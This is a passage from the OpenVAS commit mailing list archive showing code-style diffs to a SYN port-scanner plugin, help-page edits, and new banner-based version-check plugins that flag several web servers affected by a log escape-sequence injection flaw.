this for ipv6. This causes much scan delay for IPv6*/ - if(family == AF_INET) + /** @TODO How to do this for ipv6? This causes much scan delay for IPv6. */ + if (family == AF_INET) { - while (packets != NULL) { - i = 0; - retry = 0; - packets = rm_dead_packets(packets, rtt, &retry); - while (retry != 0 && i < 2) { - packets = sendpacket(soc, bpf, skip, dst, src, retry, magic, packets, &rtt, 0, env); - packets = rm_dead_packets(packets, rtt, &retry); - i++; + while (packets != NULL) + { + i = 0; + retry = 0; + packets = rm_dead_packets (packets, rtt, &retry); + while (retry != 0 && i < 2) + { + packets = sendpacket (soc, bpf, skip, dst, src, retry, magic, + packets, &rtt, 0, env); + packets = rm_dead_packets (packets, rtt, &retry); + i++; + } + packets = sendpacket (soc, bpf, skip, dst, src, retry, magic, packets, + &rtt, 1, env); } - packets = sendpacket(soc, bpf, skip, dst, src, retry, magic, packets, &rtt, 1, env); - } } - comm_send_status(globals, hname, "portscan", num, num); + comm_send_status (globals, hname, "portscan", num, num); #if 0 plug_set_key(env, "Host/num_ports_scanned", ARG_INT, (void*)num); #endif - close(soc); - bpf_close(bpf); - if(ports != NULL)efree(&ports); + close (soc); + bpf_close (bpf); + if (ports != NULL) + efree (&ports); if (num >= 65535) - plug_set_key(env, "Host/full_scan", ARG_INT, (void*) 1); + plug_set_key (env, "Host/full_scan", ARG_INT, (void*) 1); + return 0; } - - #define EN_NAME "SYN Scan" #define EN_DESC "\n\ This plugins performs a supposedly fast SYN port scan\n\ It does so by computing the RTT (round trip time) of the packets\n\ coming back and forth between the openvassd host and the target,\n\ -then it uses that to quicky send SYN packets to the remote host\n" +then it uses that to quickly send SYN packets to the remote host\n" #define COPYRIGHT "Copyright (C) Renaud Deraison " @@ -838,35 +853,32 @@ #define EN_FAMILY "Port scanners" int -plugin_init(struct arglist * desc) +plugin_init (struct arglist * desc) { - plug_set_id(desc, 11219); - plug_set_version(desc, "$Revision: 1266 $"); + plug_set_id (desc, 11219); + plug_set_version (desc, "$Revision$"); + plug_set_name (desc, EN_NAME); + plug_set_summary (desc, EN_SUMMARY); + plug_set_description (desc, EN_DESC); + plug_set_copyright (desc, COPYRIGHT); + plug_set_category (desc, ACT_SCANNER); + plug_set_family (desc, EN_FAMILY); - plug_set_name(desc, EN_NAME); - plug_set_summary(desc, EN_SUMMARY); - plug_set_description(desc, EN_DESC); - - plug_set_copyright(desc, COPYRIGHT); - plug_set_category(desc, ACT_SCANNER); - plug_set_family(desc, EN_FAMILY); - - plug_set_dep(desc, "ping_host.nasl"); - return (0); + plug_set_dep (desc, "ping_host.nasl"); + return (0); } - int -plugin_run(struct arglist * env) +plugin_run (struct arglist * env) { - unsigned long rtt; + unsigned long rtt; struct in6_addr *dst6 = plug_get_host_ip(env); - struct in_addr *dst; - struct in_addr inaddr; - struct timeval tv; + struct in_addr *dst; + struct in_addr inaddr; + struct timeval tv; inaddr.s_addr = dst6->s6_addr32[3]; dst = &inaddr; @@ -896,6 +908,3 @@ plug_set_key(env, "Host/scanners/synscan", ARG_INT, (void*)1); return 0; } - - - Property changes on: trunk/openvas-scanner/cnvts/synscan/synscan.c ___________________________________________________________________ Name: svn:keywords + Revision From scm-commit at wald.intevation.org Tue Jan 12 21:40:48 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 21:40:48 +0100 (CET) Subject: [Openvas-commits] r6388 - in trunk/gsa: . src/html/src/help Message-ID: <20100112204048.BAC67861F2EE@pyrosoma.intevation.org> Author: jan Date: 2010-01-12 21:40:47 +0100 (Tue, 12 Jan 2010) New Revision: 6388 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/contents.htm4 Log: * src/html/src/help/contents.htm4: Indention for subgroups. Added a link for each separate file. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 13:03:27 UTC (rev 6387) +++ trunk/gsa/ChangeLog 2010-01-12 20:40:47 UTC (rev 6388) @@ -1,3 +1,8 @@ +2010-01-12 Jan-Oliver Wagner + + * src/html/src/help/contents.htm4: Indention for subgroups. + Added a link for each separate file. + 2010-01-12 Felix Wolfsteller Updated help. Modified: trunk/gsa/src/html/src/help/contents.htm4 =================================================================== --- trunk/gsa/src/html/src/help/contents.htm4 2010-01-12 13:03:27 UTC (rev 6387) +++ trunk/gsa/src/html/src/help/contents.htm4 2010-01-12 20:40:47 UTC (rev 6388) @@ -15,16 +15,24 @@
          • Scan Management
          • Configuration
            • Configure Scan Configs
              • -
            • Scan Config Details
              • -
            • Scan Config Editor
              • +
            • Configure Targets
            • Configure Credentials
            • Configure Agents
              • From scm-commit at wald.intevation.org Wed Jan 13 09:20:57 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 09:20:57 +0100 (CET) Subject: [Openvas-commits] r6389 - in trunk/gsa: . src/html/src/help Message-ID: <20100113082057.AD130861F2DF@pyrosoma.intevation.org> Author: felix Date: 2010-01-13 09:20:56 +0100 (Wed, 13 Jan 2010) New Revision: 6389 Added: trunk/gsa/src/html/src/help/scanconfig_editor_nvt.htm4 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/scanconfig_details.htm4 trunk/gsa/src/html/src/help/scanconfig_editor.htm4 trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 Log: Updated help. * src/html/src/help/scanconfig_familiy_details.htm4, src/html/scanconfig_editor.htm4, src/html/scanconfig_editor_nvt_families.htm4, src/html/src/help/scanconfig_details.htm4, src/html/src/help/scanconfig_family_details.htm4: Added links to other help pages. * src/html/src/help/scanconfig_editor_nvt.htm4: New. Accidentally ommitted in last commits. Contains help texts regarding Scan Config NVT Editor. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 20:40:47 UTC (rev 6388) +++ trunk/gsa/ChangeLog 2010-01-13 08:20:56 UTC (rev 6389) @@ -1,3 +1,18 @@ +2010-01-13 Felix Wolfsteller + + Updated help. + + * src/html/src/help/scanconfig_familiy_details.htm4, + src/html/scanconfig_editor.htm4, + src/html/scanconfig_editor_nvt_families.htm4, + src/html/src/help/scanconfig_details.htm4, + src/html/src/help/scanconfig_family_details.htm4: Added links to other + help pages. + + * src/html/src/help/scanconfig_editor_nvt.htm4: New. Accidentally + ommitted in last commits. Contains help texts regarding + Scan Config NVT Editor. + 2010-01-12 Jan-Oliver Wagner * src/html/src/help/contents.htm4: Indention for subgroups. Modified: trunk/gsa/src/html/src/help/scanconfig_details.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_details.htm4 2010-01-12 20:40:47 UTC (rev 6388) +++ trunk/gsa/src/html/src/help/scanconfig_details.htm4 2010-01-13 08:20:56 UTC (rev 6389) @@ -49,8 +49,8 @@

              Scan Config Family Details

              -A click on the details icon Details will show an -intermediate detailled list of NVTs and its preferences. +A click on the details icon Details +will show an intermediate detailed list of NVTs and its preferences.

              Scanner Preferences

              @@ -109,7 +109,7 @@

              A click on the details icon Details will open the -Scan Config NVT Details dialog with detailed information about a certain NVT +Scan Config NVT Details dialog with detailed information about a certain NVT and all its preferences.

              Modified: trunk/gsa/src/html/src/help/scanconfig_editor.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-12 20:40:47 UTC (rev 6388) +++ trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-13 08:20:56 UTC (rev 6389) @@ -142,16 +142,16 @@

              A click on the details icon Details will open the -Scan Config NVT Details dialog with detailed information about a certain NVT -and all its preferences. +Scan Config NVT Details dialog +with detailed information about a certain NVT and all its preferences.

              Edit Scan Config NVT Details

              A click on the edit icon Edit -will open the Edit Scan Config NVT Details dialog with detailed information about a -certain NVT and all its preferences. +will open the Edit Scan Config NVT Details +dialog with detailed information about a certain NVT and all its preferences. This page will provide an overview over all preferences and the currently set Timeout for this NVT and allow modifications.

              Added: trunk/gsa/src/html/src/help/scanconfig_editor_nvt.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor_nvt.htm4 2010-01-12 20:40:47 UTC (rev 6388) +++ trunk/gsa/src/html/src/help/scanconfig_editor_nvt.htm4 2010-01-13 08:20:56 UTC (rev 6389) @@ -0,0 +1,60 @@ +m4_define(`PAGE_TITLE', `Help: Edit Scan Config NVT Details') +m4_include(`header.m4') + +
              + +

              Edit Scan Config NVT Details

              + +

              +This dialog shows information of a single NVT +and its preference settings within a +Scan Configuration. +

              + +

              Edit Network Vulnerability Test

              + +

              Details

              + +

              +Provides information like the name of the NVT, a summary, its OID, Family +Affiliation and References. +

              + +

              Description

              + +

              +This section provides a description of the NVT. It might contain a +classification into a Risk Factor and suggest solutions to fix the issue that +can be detected by this NVT. +

              + +

              Preferences

              + +

              +This table shows values of the timeout and NVT specific preferences one per +row. Depending on the Preference, there are different input methods (e.g. +checkboxes, text input fields, etc). +

              + +

              +Note: After any changes, the "Save Config" button has to be clicked. +

              + + + + + + + + + + + + + + +
              ColumnDescription
              NameShows the name of the NVT Preference.
              ValueThe value for the NVT Preference in the given Scan Configuration. + For different Preference Types, different input methods are shown.
              + +m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 2010-01-12 20:40:47 UTC (rev 6388) +++ trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 2010-01-13 08:20:56 UTC (rev 6389) @@ -54,14 +54,14 @@

              A click on the details icon GSAD_HTML_ICON_DETAILS -will lead to the page listing NVT details. +will lead to the page listing NVT details.

              Select and Edit NVT Details

              A click on the edit icon GSAD_HTML_ICON_EDIT will add the NVT to the selection -and lead to a page that lists NVT details and allows to modify preferences and +and lead to a page that lists NVT details and allows to modify preferences and the timeout.

              Modified: trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 2010-01-12 20:40:47 UTC (rev 6388) +++ trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 2010-01-13 08:20:56 UTC (rev 6389) @@ -48,7 +48,7 @@

              A click on the details icon GSAD_HTML_ICON_DETAILS -will lead to the page listing NVT details. +will lead to the page listing NVT details.

              m4_include(`footer.m4') From scm-commit at wald.intevation.org Wed Jan 13 11:19:50 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 11:19:50 +0100 (CET) Subject: [Openvas-commits] r6390 - in trunk/openvas-administrator: . src src/tests Message-ID: <20100113101950.0725C861F2F3@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 11:19:49 +0100 (Wed, 13 Jan 2010) New Revision: 6390 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c trunk/openvas-administrator/src/tests/oap_help_0.c Log: * src/oap.c (help_text): Add GET_SETTINGS. * src/tests/oap_help_0.c (help_text): Add GET_SETTINGS. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 08:20:56 UTC (rev 6389) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 10:19:49 UTC (rev 6390) @@ -1,3 +1,9 @@ +2009-01-13 Matthew Mundell + + * src/oap.c (help_text): Add GET_SETTINGS. + + * src/tests/oap_help_0.c (help_text): Add GET_SETTINGS. + 2009-12-30 Matthew Mundell * src/oapd.c (serve_omp): Just read and log a character on select Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 08:20:56 UTC (rev 6389) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 10:19:49 UTC (rev 6390) @@ -208,6 +208,7 @@ " CREATE_USER Create a new user.\n" " DELETE_USER Delete an existing user.\n" " GET_USERS Get all users.\n" +" GET_SETTINGS Get scanner settings.\n" " GET_VERSION Get the OpenVAS Administrator Protocol version.\n" " DESCRIBE_FEED Get details of the feed this administrator synchronizes with.\n" " SYNC_FEED Synchronize with an NVT feed.\n" Modified: trunk/openvas-administrator/src/tests/oap_help_0.c =================================================================== --- trunk/openvas-administrator/src/tests/oap_help_0.c 2010-01-13 08:20:56 UTC (rev 6389) +++ trunk/openvas-administrator/src/tests/oap_help_0.c 2010-01-13 10:19:49 UTC (rev 6390) @@ -38,6 +38,7 @@ " CREATE_USER Create a new user.\n" " DELETE_USER Delete an existing user.\n" " GET_USERS Get all users.\n" +" GET_SETTINGS Get scanner settings.\n" " GET_VERSION Get the OpenVAS Administrator Protocol version.\n" " DESCRIBE_FEED Get details of the feed this administrator synchronizes with.\n" " SYNC_FEED Synchronize with an NVT feed.\n" From scm-commit at wald.intevation.org Wed Jan 13 11:20:30 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 11:20:30 +0100 (CET) Subject: [Openvas-commits] r6391 - in trunk/openvas-plugins: . scripts Message-ID: <20100113102030.BC23886607AF@pyrosoma.intevation.org> Author: mime Date: 2010-01-13 11:20:27 +0100 (Wed, 13 Jan 2010) New Revision: 6391 Added: trunk/openvas-plugins/scripts/aolserver_37712.nasl trunk/openvas-plugins/scripts/boa_webserver_37718.nasl trunk/openvas-plugins/scripts/cherokee_37715.nasl trunk/openvas-plugins/scripts/minihttpd_and_thttpd_webserver_37714.nasl trunk/openvas-plugins/scripts/nginx_37711.nasl trunk/openvas-plugins/scripts/orion_webserver_37717.nasl trunk/openvas-plugins/scripts/ruby_WEBrick_37710.nasl trunk/openvas-plugins/scripts/yaws_webserver_37716.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/ChangeLog 2010-01-13 10:20:27 UTC (rev 6391) @@ -1,3 +1,15 @@ +2010-01-13 Michael Meyer + + * scripts/yaws_webserver_37716.nasl + scripts/minihttpd_and_thttpd_webserver_37714.nasl + scripts/cherokee_37715.nasl + scripts/boa_webserver_37718.nasl + scripts/ruby_WEBrick_37710.nasl + scripts/orion_webserver_37717.nasl + scripts/nginx_37711.nasl + scripts/aolserver_37712.nasl: + Added new plugins. + 2010-01-12 Michael Meyer * scripts/sun_dir_server_detect.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/cve_current.txt 2010-01-13 10:20:27 UTC (rev 6391) @@ -480,3 +480,12 @@ CVE-2009-4486 Greenbone svn R 37640 Greenbone svn R 37699 Greenbone svn R +CVE-2009-4487 Greenbone svn R +CVE-2009-4489 Greenbone svn R +CVE-2009-4490 Greenbone svn R +CVE-2009-4491 Greenbone svn R +CVE-2009-4492 Greenbone svn R +CVE-2009-4493 Greenbone svn R +CVE-2009-4494 Greenbone svn R +CVE-2009-4495 Greenbone svn R +CVE-2009-4496 Greenbone svn R Added: trunk/openvas-plugins/scripts/aolserver_37712.nasl =================================================================== --- trunk/openvas-plugins/scripts/aolserver_37712.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/aolserver_37712.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100442); + script_bugtraq_id(37712); + script_cve_id("CVE-2009-4494"); + script_version ("1.0-$Revision$"); + + script_name("AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +AOLServer is prone to a command-injection vulnerability because it +fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +AOLServer 4.5.1 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/37712 +http://www.aolserver.com/ +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if AOLServer version is <= 4.5.1"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if(egrep(pattern:"AOLserver/", string:banner)) + { + version = eregmatch(pattern: "AOLserver/([0-9.]+)", string: banner); + + if(isnull(version[1]))exit(0); + + if(version_is_less_equal(version: version[1], test_version: "4.5.1")) { + security_warning(port:port); + exit(0); + } + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/aolserver_37712.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/boa_webserver_37718.nasl =================================================================== --- trunk/openvas-plugins/scripts/boa_webserver_37718.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/boa_webserver_37718.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100443); + script_bugtraq_id(37718); + script_cve_id("CVE-2009-4496"); + script_version ("1.0-$Revision$"); + + script_name("Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +Boa Webserver is prone to a command-injection vulnerability because it +fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +Boa Webserver 0.94.14rc21 is vulnerable; other versions may also +be affected. + +References: +http://www.securityfocus.com/bid/37718 +http://www.boa.org/ +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Boa Webserver version is <= 0.94.14rc21"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if(egrep(pattern:"Boa/", string:banner)) + { + + version = eregmatch(pattern:"Boa/([0-9.]+[rc0-9]*)", string: banner); + if(isnull(version[1]))exit(0); + + if(version_is_less_equal(version: version[1], test_version: "0.94.14rc21")) { + security_warning(port:port); + exit(0); + } + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/boa_webserver_37718.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/cherokee_37715.nasl =================================================================== --- trunk/openvas-plugins/scripts/cherokee_37715.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/cherokee_37715.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,88 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Cherokee Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100440); + script_bugtraq_id(37715); + script_cve_id("CVE-2009-4489"); + script_version ("1.0-$Revision$"); + + script_name("Cherokee Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +Cherokee is prone to a command-injection vulnerability because it +fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +Cherokee 0.99.30 and prior are vulnerable. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37715 +http://www.alobbs.com/modules.php?op=modload&name=cherokee&file=index +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Cherokee version is <= 0.99.30"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if("Cherokee" >< banner) { + + if(!version = eregmatch(pattern:"Server: Cherokee/([0-9.]+)", string:banner))exit(0); + vers = version[1]; + + if(!isnull(vers)) { + if(version_is_less_equal(version: vers, test_version:"0.99.30")) { + security_warning(port:port); + exit(0); + } + } + } + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cherokee_37715.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/minihttpd_and_thttpd_webserver_37714.nasl =================================================================== --- trunk/openvas-plugins/scripts/minihttpd_and_thttpd_webserver_37714.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/minihttpd_and_thttpd_webserver_37714.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,93 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100447); + script_bugtraq_id(37714); + script_cve_id("CVE-2009-4490","CVE-2009-4491"); + script_version ("1.0-$Revision$"); + + script_name("Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +Acme 'thttpd' and 'mini_httpd' are prone to a command-injection +vulnerability because they fail to adequately sanitize user-supplied +input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +This issue affects thttpd 2.25b and mini_httpd 1.19; other versions +may also be affected. + +References: +http://www.securityfocus.com/bid/37714 +http://www.acme.com/software/mini_httpd/ +http://www.acme.com/software/thttpd/ +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine the thttpd/mini_httpd version"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if("Server: mini_httpd/" >< banner) { + version = eregmatch(pattern:"Server: mini_httpd/([0-9.]+)", string: banner); + if(!isnull(version[1])) { + if(version_is_less_equal(version: version[1], test_version: "1.19")) { + security_warning(port:port); + exit(0); + } + } +} +else if("Server: thttpd/" >< banner) { + version = eregmatch(pattern:"Server: thttpd/([0-9.]+[a-z]*)", string: banner); + if(!isnull(version[1])) { + if(version_is_less_equal(version: version[1], test_version: "2.25b")) { + security_warning(port:port); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/minihttpd_and_thttpd_webserver_37714.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_37711.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_37711.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/nginx_37711.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,78 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100441); + script_bugtraq_id(37711); +script_cve_id("CVE-2009-4487"); +script_version ("1.0-$Revision$"); + +script_name("nginx Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +The 'nginx' program is prone to a command-injection vulnerability +because it fails to adequately sanitize user-supplied input in +log files. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +This issue affects nginx 0.7.64; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/37711 +http://nginx.net/ +http://www.securityfocus.com/archive/1/508830 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if nginx version is 0.7.64"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); + +if(!isnull(vers) && vers >!< "unknown") { + if(version_is_equal(version: vers, test_version:"0.7.64")) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/nginx_37711.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/orion_webserver_37717.nasl =================================================================== --- trunk/openvas-plugins/scripts/orion_webserver_37717.nasl 2010-01-13 10:19:49 UTC (rev 6390) +++ trunk/openvas-plugins/scripts/orion_webserver_37717.nasl 2010-01-13 10:20:27 UTC (rev 6391) @@ -0,0 +1,89 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100444); + script_bugtraq_id(37717); + script_cve_id("CVE-2009-4493"); + script_version ("1.0-$Revision$"); + + script_name("Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability"); + +desc = "Overview: +Orion Application Server is prone to a command-injection +vulnerability because it fails to adequately sanitize user-supplied +input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in +a terminal. + +Orion Application Server 2.0.7 is vulnerable; other versions may also +be affected. + +References: +http://www.securityfocus.com/bid/37717 +http://www.orionserver.com +http://www.securityfocus.com/archive/1/508830 + +Risk factor : ;Medium"; + + script_description(desc); + script_summary("Determine if Orion Application Server version is <= 2.0.7"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); 